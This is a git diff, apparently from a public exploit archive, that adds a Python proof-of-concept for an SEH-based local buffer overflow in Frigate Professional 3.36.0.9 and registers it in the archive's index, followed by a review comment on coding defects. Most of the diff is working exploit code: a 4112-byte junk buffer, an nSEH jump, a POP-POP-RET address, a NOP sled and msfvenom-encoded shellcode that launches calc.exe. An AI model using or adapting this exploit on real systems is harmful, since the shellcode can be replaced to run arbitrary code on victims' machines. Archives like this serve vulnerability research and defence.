diff --git a/exploits/windows/local/48579.py b/exploits/windows/local/48579.py
new file mode 100755
index 000000000..b74eed89d
--- /dev/null
+++ b/exploits/windows/local/48579.py
@@ -0,0 +1,67 @@
+# Exploit Title: Frigate Professional 3.36.0.9 - 'Find Computer' Local Buffer Overflow (SEH) (PoC)
+# Vendor Homepage: http://www.frigate3.com/
+# Software Link Download: http://www.frigate3.com/download/frigate3_pro.exe
+# Exploit Author: Paras Bhatia
+# Discovery Date: 2020-06-04
+# Vulnerable Software: Frigate Professional
+# Version: 3.36.0.9
+# Vulnerability Type: Local Buffer Overflow
+# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)
+
+#Steps to Produce the Crash:
+
+# 1.- Run python code: FrigateLCE.py
+# 2.- Copy content to clipboard
+# 3.- Turn off DEP for Frigate3.exe
+# 4.- Open "Frigate3.exe"
+# 5.- Go to "Disk" > Find Computer
+# 6.- Paste ClipBoard into the "Computer Name:" field
+# 7.- Click on OK
+# 8.- Calc.exe runs
+
+
+#################################################################################################################################################
+
+#Python "FrigateLCE.py" Code:
+
+f= open("FrigateLCE.txt", "w")
+
+junk="A" * 4112
+
+nseh="\xeb\x20\x90\x90"
+
+seh="\x4B\x0C\x01\x40"
+
+#40010C4B 5B POP EBX
+#40010C4C 5D POP EBP
+#40010C4D C3 RETN
+#POP EBX ,POP EBP, RETN | [rtl60.bpl] (C:\Program Files\Frigate3\rtl60.bpl)
+
+nops="\x90" * 50
+
+# msfvenom -a x86 --platform windows -p windows/exec CMD=calc -e x86/alpha_mixed -b "\x00\x14\x09\x0a\x0d" -f python
+
+buf = ""
+buf += "\xbf\xe3\xfa\x7b\x97\xdb\xd5\xd9\x74\x24\xf4\x5d\x2b"
+buf += "\xc9\xb1\x30\x83\xed\xfc\x31\x7d\x0f\x03\x7d\xec\x18"
+buf += "\x8e\x6b\x1a\x5e\x71\x94\xda\x3f\xfb\x71\xeb\x7f\x9f"
+buf += "\xf2\x5b\xb0\xeb\x57\x57\x3b\xb9\x43\xec\x49\x16\x63"
+buf += "\x45\xe7\x40\x4a\x56\x54\xb0\xcd\xd4\xa7\xe5\x2d\xe5"
+buf += "\x67\xf8\x2c\x22\x95\xf1\x7d\xfb\xd1\xa4\x91\x88\xac"
+buf += "\x74\x19\xc2\x21\xfd\xfe\x92\x40\x2c\x51\xa9\x1a\xee"
+buf += "\x53\x7e\x17\xa7\x4b\x63\x12\x71\xe7\x57\xe8\x80\x21"
+buf += "\xa6\x11\x2e\x0c\x07\xe0\x2e\x48\xaf\x1b\x45\xa0\xcc"
+buf += "\xa6\x5e\x77\xaf\x7c\xea\x6c\x17\xf6\x4c\x49\xa6\xdb"
+buf += "\x0b\x1a\xa4\x90\x58\x44\xa8\x27\x8c\xfe\xd4\xac\x33"
+buf += "\xd1\x5d\xf6\x17\xf5\x06\xac\x36\xac\xe2\x03\x46\xae"
+buf += "\x4d\xfb\xe2\xa4\x63\xe8\x9e\xe6\xe9\xef\x2d\x9d\x5f"
+buf += "\xef\x2d\x9e\xcf\x98\x1c\x15\x80\xdf\xa0\xfc\xe5\x10"
+buf += "\xeb\x5d\x4f\xb9\xb2\x37\xd2\xa4\x44\xe2\x10\xd1\xc6"
+buf += "\x07\xe8\x26\xd6\x6d\xed\x63\x50\x9d\x9f\xfc\x35\xa1"
+buf += "\x0c\xfc\x1f\xc2\xd3\x6e\xc3\x05"
+
+
+payload = junk + nseh + seh + nops + buf
+
+f.write(payload)
+f.close
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index b4b44ad01..1364a99ad 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11093,6 +11093,7 @@ id,file,description,date,author,type,platform,port
 48564,exploits/windows/local/48564.py,"Quick Player 1.3 - '.m3l' Buffer Overflow (Unicode & SEH)",2020-06-08,"Felipe Winsnes",local,windows,
 48570,exploits/windows/local/48570.py,"10-Strike Bandwidth Monitor 3.9 - Buffer Overflow (SEH_DEP_ASLR)",2020-06-10,boku,local,windows,
 48573,exploits/windows/local/48573.txt,"WinGate 9.4.1.5998 - Insecure Folder Permissions",2020-06-10,hyp3rlinx,local,windows,
+48579,exploits/windows/local/48579.py,"Frigate Professional 3.36.0.9 - 'Find Computer' Local Buffer Overflow (SEH) (PoC)",2020-06-11,"Paras Bhatia",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
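Review bot: The last line of the new file, `f.close`, only references the bound method and never calls it, so the file is closed (and the buffered write flushed) only at interpreter exit; it should read `f.close()`, or the `f.write(payload)` should sit inside `with open("FrigateLCE.txt", "w") as f:` so no explicit close is needed. The script is also Python 2 specific: it relies on `str` literals holding raw bytes, and under Python 3 a text-mode write would UTF-8-encode every escape above `\x7f`, so the output file would not contain the bytes the comments describe; the header should state the interpreter version it was tested with. The step list in the header refers to `FrigateLCE.py` while the committed file is `48579.py`, which a comment such as `# this file was originally named FrigateLCE.py` would reconcile.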